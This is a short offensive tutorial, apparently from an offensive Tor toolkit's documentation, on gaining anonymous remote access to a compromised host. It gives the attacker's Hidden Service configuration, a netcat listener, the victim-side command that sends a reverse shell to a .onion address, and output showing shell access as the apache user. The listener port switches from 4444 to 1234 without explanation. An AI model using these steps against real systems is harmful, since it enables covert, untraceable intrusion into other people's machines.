Gaining access with reverse-shell-over-tor

We assume that we are able to execute commands in Victim1 in some way.

In order to obtain a reverse shell preserving anonymity, we will use reverse-shell-over-tor from Offensive Tor Toolkit. As shown in the following illustration, the attacker will publish a Hidden Service so that the victim can send the reverse shell to it.

Reverse shell over Tor

1. Hidden Service and handler

The attacker will publish a Hidden Service so that the attacker can start a connection:

[attacker]$ grep '^HiddenService' /etc/tor/torrc
HiddenServiceDir /tmp/tortest
HiddenServicePort 4444 127.0.0.1:4444

[attacker]$ cat /tmp/tortest/hostname
m5et..jyd.onion

[attacker]$ tor -f /etc/tor/torrc

In order to handle the connection, the attacker will start a listener with netcat:

[attacker]$ nc -lvnp 4444

2. Victim connects to the Hidden Service

We have to launch a reverse shell from the Victim to the Hidden Service. The tool we need is reverse-shell-over-tor . The only parameter we need is the address and port in which the Hidden Service is listening.

[victim1]$ ./reverse-shell-over-tor -listener m5et..jyd.onion:4444

3. The handler receives the shell

Once the victim connects with reverse-shell-over-tor , a /bin/sh shell is launched.

[attacker]$ nc -lvnp 1234
...
id
uid=48(apache) gid=48(apache) groups=48(apache)

The attacker could change the shell binary by using the parameter -reverse-shell-program.